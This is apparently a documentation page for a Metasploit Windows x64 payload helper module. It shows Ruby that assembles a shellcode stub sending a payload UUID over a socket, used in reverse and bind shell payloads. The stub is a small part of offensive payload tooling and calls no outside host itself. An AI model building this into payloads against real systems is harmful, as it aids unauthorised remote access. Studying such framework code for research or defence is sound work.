Module: Msf::Payload::Windows::SendUUID_x64

Included in:
BindNamedPipe_x64, BindTcp_x64, ReverseNamedPipe_x64, ReverseTcp_x64
Defined in:
lib/msf/core/payload/windows/x64/send_uuid.rb

Overview

Basic send_uuid stub for Windows ARCH_X64 payloads

Instance Method Summary collapse

Instance Method Details

#asm_send_uuid(uuid = nil) ⇒ Object

Generate assembly code that writes the UUID to the socket.

This code assumes that the block API pointer is in rbp, and the communications socket handle is in rdi.


22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# File 'lib/msf/core/payload/windows/x64/send_uuid.rb', line 22

def asm_send_uuid(uuid=nil)
  uuid ||= generate_payload_uuid
  uuid_raw = uuid.to_raw

  asm =%Q^
    send_uuid:
      xor r9, r9              ; flags
      push #{uuid_raw.length} ; length of the UUID
      pop r8
      call get_uuid_address  ; put uuid buffer on the stack
      db #{raw_to_db(uuid_raw)}  ; UUID
    get_uuid_address:
      pop rdx                ; UUID address
      mov rcx, rdi           ; Socket handle
      mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
      call rbp               ; call send
  ^

  asm
end

#uuid_required_sizeObject


43
44
45
46
47
48
49
50
51
# File 'lib/msf/core/payload/windows/x64/send_uuid.rb', line 43

def uuid_required_size
  # Start with the number of bytes required for the instructions
  space = 25

  # a UUID is 16 bytes
  space += 16

  space
end